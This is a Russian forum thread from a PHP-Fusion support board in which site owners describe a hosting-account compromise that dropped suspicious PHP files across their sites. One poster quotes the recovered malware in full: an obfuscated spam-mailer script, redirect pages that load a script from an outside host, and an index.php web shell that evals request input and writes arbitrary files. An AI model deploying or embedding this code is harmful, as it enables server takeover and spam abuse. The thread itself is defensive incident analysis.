Забыли пароль?
Запросите новый здесь.

Автор темы: Alex
ID темы: 1343
Информация:
Тема содержит 43 сообщения, была просмотрена 23124 раз.
Просмотр темы
PHP-Fusion Russia » Поддержка 7 версии » Безопасность
 Распечатать тему
в корне всех сайтов появился wp-conf.php
Alex
в корне всех сайтов появился wp-conf.php и 5-7 файлов w(набор цифр)n.php

на хостинге 10 сайтов на фьюжене, 1 ворд пресс, 1 джумла

может быть кто знает через что он проникает и размножается по всему аккаунту
 
Web
Serge Renard
Название первого файла однозначно наводит на мысль о wordpress. Если это не маскировка или совпадение, конечно.
 
Web
Rush
лиииистииииииииинг!
 
Web
Alex
Serge Renard написал:

Название первого файла однозначно наводит на мысль о wordpress. Если это не маскировка или совпадение, конечно.


тоже так думаю маскировка под файл wp-config.php

Rush написал:

лиииистииииииииинг!


можно поподробнее
 
Web
jikaka
Alex, в пятницу у меня была идентичная ситуация
в корень каждого сайта были загружены следующие файлы:
w35574914n.php
w58108374n.php
w82323321n.php
wp-conf.php

по мимо этого, на каждом сайте были изменены первые 2 файла,
например, articles.php и contact.php
т.е. те файлы, которые идут сразу же после папок
в них в самое начало была добавлена строка

на одном из сайтов, версия двига 7.02.05, был изменен файл viewpage.php, с помощью которого все это дело и внедрили

помимо этого, еще в разные места каждого сайта были запрятаны разные файлы типа: code.php, header.php, file.php и т.д.

и кстати, еще были изменены кое-где пустые index.php

все чистил около 3х часов по изменению дат файлов

PS: ах, да! совсем забыл! на акке нету сторонних движков!
 
Web
Zaxap
А я то думаю, откуда он...
Хотел стереть, да интернет вырубило, потом забыл...)
Зло не дремлет, а я добрый...
x1
 
Alex
эта ситуация повторилась уже второй раз, после первого раза удалил все фтп аккаунты и у основного аккаунта сменен пароль,

это происходит у меня только на бегете.

на рбк всё спокойно
 
Web
dark
Если ломают через тот эксплоит что в паблике, то в файле profile.php достаточно стереть вывод <!--profile_user_name--> . Это уже отсекет часть школоты которая ручками не сможет проверить что этой строки нет. Хотя по сути это никак не поможет от остальных, лучше все же обновиться.
 
jikaka
Alex, на акке сайты на фьюжике какой версии?
 
Web
Zaxap
А th_cache.txt - это что?)
Зло не дремлет, а я добрый...
 
dark
Выложите кто нибудь наконец эти файлы, что мы все гадаем, как экстрасенсы.
 
jikaka
к сожалению, я все удалил
 
Web
Alex
jikaka написал:

Alex, на акке сайты на фьюжике какой версии?


7,02,05 и 7,02,06

сижу обновляю
 
Web
jikaka
сижу обновляю

после того как меня сегодня повторно хакнули, тоже обновил все сайты
замечу одно, что в этот раз меньше было нанесено вреда, раза в 3 меньше
 
Web
Pisatel
Насколько я понял, "лииииистинг"- человек просит исходный код ему показать.:-)
 
Web
Rush
http://ru.wikiped...%B8%D0%B5)

толку от ваших постов без этого
x1
 
Web
jikaka
вот такие чужеродные файлы внедряются - code.php:
Загрузить источник  GeSHi: PHP
  1. <?php
  2. @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; if (!in_array('mail', $v619d75f8)) { if ($v10497e3f) { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) die(chr(79).chr(75).md5(1234567890)."+0"); } else { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) die(chr(79).chr(75).md5(1234567890)."+0"); } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { die(chr(79).chr(75).md5(1234567890)."+1"); } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417"; } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>
  3.  
Добавлено за 0.089 секунд, используя GeSHi 1.0.8.10


global.php:
Загрузить источник  GeSHi: PHP
  1. <html>
  2. <head>
  3. <script type="text/javascript" src="http://ajax.googleminiapi.com/lib/angular.min.js"></script>
  4. <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://www.doctortyir.com">
  5. </head>
  6. <body>
  7. </body>
  8. </html>
Добавлено за 0.032 секунд, используя GeSHi 1.0.8.10


plugin.php
Загрузить источник  GeSHi: PHP
  1. <html>
  2. <head>
  3. <script type="text/javascript" src="http://ajax.googleminiapi.com/lib/angular.min.js"></script>
  4. <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://www.doctortyir.com">
  5. </head>
  6. <body>
  7. </body>
  8. </html>
Добавлено за 0.032 секунд, используя GeSHi 1.0.8.10


index.php
Загрузить источник  GeSHi: PHP
  1. <?php $rcbam = "69b560d7cab447c84d71891ff5dfa7d7"; if(isset($_REQUEST['ywthcd'])) { $akhl = $_REQUEST['ywthcd']; eval($akhl); exit(); } if(isset($_REQUEST['pbikzigf'])) { $xqtn = $_REQUEST['mijzvivp']; $yssydzj = $_REQUEST['pbikzigf']; $plia = fopen($yssydzj, 'w'); $qgqueh = fwrite($plia, $xqtn); fclose($plia); echo $qgqueh; exit(); } ?>
Добавлено за 0.038 секунд, используя GeSHi 1.0.8.10

 
Web
Rush
ясно. тупо рассылка спама
 
Web
Zaxap
Странную весьма вещь я на сайте нашел...
_log404.log с таки вот содержимым:
Загрузить источник  GeSHi: PHP
  1. /w85177271n.php ( 03:03:23 2013-02-23 @ 31.133.40.153 )
  2. /favicon.ico ( 03:03:25 2013-02-23 @ 77.34.20.5 => Zaxap )
  3. /favicon.ico ( 03:03:26 2013-02-23 @ 77.34.20.5 => Zaxap )
  4. /w85177271n.php ( 03:03:28 2013-02-23 @ 31.133.40.153 )
  5. /w85177271n.php ( 03:03:44 2013-02-23 @ 31.133.40.153 )
  6. /favicon.ico ( 03:03:52 2013-02-23 @ 77.34.20.5 => Zaxap )
Добавлено за 0.042 секунд, используя GeSHi 1.0.8.10


Да и еще несколько штук хз, что делают на сервере:)
Зло не дремлет, а я добрый...
 
Alex
Zaxap, это лог скорей всего от хостера того когда и с какого айпи были загружены файлы
 
Web

Поделиться этой темой
Социальные закладки: Vkontakte Odnoklassniki Mail.ru Facebook Google Tweet This
URL:
BBcode:
HTML:

Перейти на форум:
Похожие темы
Темы Форум Ответов / Просмотров Последние сообщения
Как правильно загрузить свой шрифт в css для всех браузеров?  →  Темы оформления 7 версии 12 / 5516 04.08.2017 10:06
Сколково Телеком - качественный хостинг сайтов на SSD дисках  →  Хостинг 7 / 8159 22.12.2016 17:00
Показ всех категорий статей  →  Моды 2 / 1452 11.09.2016 15:44
Как сделать разное мето описание на всех странциах?  →  Вопросы новичков 25 / 23364 27.10.2015 22:32
Хостинг сайтов по экономным ценам Lowhosting.ru  →  Реклама на портале 7 / 5881 04.05.2015 14:50
Как подписать всех по умолчанию в плагине "Новостная рассылка"?  →  Народное творчество 7 / 3433 30.10.2014 16:56
вывод всех статей вместо категорий  →  Моды 2 / 2735 06.06.2014 18:18
Владельцев сайтов обяжут хранить информацию о действиях пользователей  →  Флуд 25 / 8780 19.04.2014 02:01
Создание и продвижение сайтов “Superpromo”  →  Платные услуги 5 / 2931 12.09.2013 04:33
Хостинг сайтов timhost.ru  →  Хостинг 6 / 1585 23.06.2013 12:20
Топ 5 пользователей форума
Alex Alex (1,171)   Zaxap Zaxap (1,078)   Vova Vova (877)   Pisatel Pisatel (678)   util util (666)